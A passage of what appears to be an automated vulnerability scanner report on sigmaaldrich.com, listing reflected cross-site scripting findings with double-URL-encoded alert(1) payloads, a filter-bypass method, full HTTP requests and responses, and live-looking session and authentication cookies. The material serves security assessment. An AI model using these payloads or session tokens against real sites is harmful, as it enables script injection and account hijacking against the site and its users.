Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:12 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/labware53984";alert(1)//e172f22c51a/labware-catalog","E404") ;
   </script>
...[SNIP]...

1.103. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/labware/labware-catalog [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/labware/labware-catalog

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc4ef%2522%253balert%25281%2529%252f%252fb1741c0c7a1 was submitted in the REST URL parameter 5. This input was echoed as bc4ef";alert(1)//b1741c0c7a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/labware/labware-catalogbc4ef%2522%253balert%25281%2529%252f%252fb1741c0c7a1 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:14 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/labware/labware-catalogbc4ef";alert(1)//b1741c0c7a1","E404") ;
   </script>
...[SNIP]...

1.104. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/custom-oligos [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/custom-oligos

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed65a%2522%253balert%25281%2529%252f%252fc4bf42e1856 was submitted in the REST URL parameter 1. This input was echoed as ed65a";alert(1)//c4bf42e1856 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contented65a%2522%253balert%25281%2529%252f%252fc4bf42e1856/sigma-aldrich/areas-of-interest/life-science/custom-oligos HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:00 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contented65a";alert(1)//c4bf42e1856/sigma-aldrich/areas-of-interest/life-science/custom-oligos","E404") ;
   </script>
...[SNIP]...

1.105. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/custom-oligos [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/custom-oligos

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49565%2522%253balert%25281%2529%252f%252f76b01f700a7 was submitted in the REST URL parameter 2. This input was echoed as 49565";alert(1)//76b01f700a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich49565%2522%253balert%25281%2529%252f%252f76b01f700a7/areas-of-interest/life-science/custom-oligos HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:02 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich49565";alert(1)//76b01f700a7/areas-of-interest/life-science/custom-oligos","E404") ;
   </script>
...[SNIP]...

1.106. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/custom-oligos [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/custom-oligos

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcb63%2522%253balert%25281%2529%252f%252f821f33370a5 was submitted in the REST URL parameter 3. This input was echoed as fcb63";alert(1)//821f33370a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interestfcb63%2522%253balert%25281%2529%252f%252f821f33370a5/life-science/custom-oligos HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interestfcb63";alert(1)//821f33370a5/life-science/custom-oligos","E404") ;
   </script>
...[SNIP]...

1.107. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/custom-oligos [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/custom-oligos

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8080f%2522%253balert%25281%2529%252f%252f2611162ee43 was submitted in the REST URL parameter 4. This input was echoed as 8080f";alert(1)//2611162ee43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science8080f%2522%253balert%25281%2529%252f%252f2611162ee43/custom-oligos HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
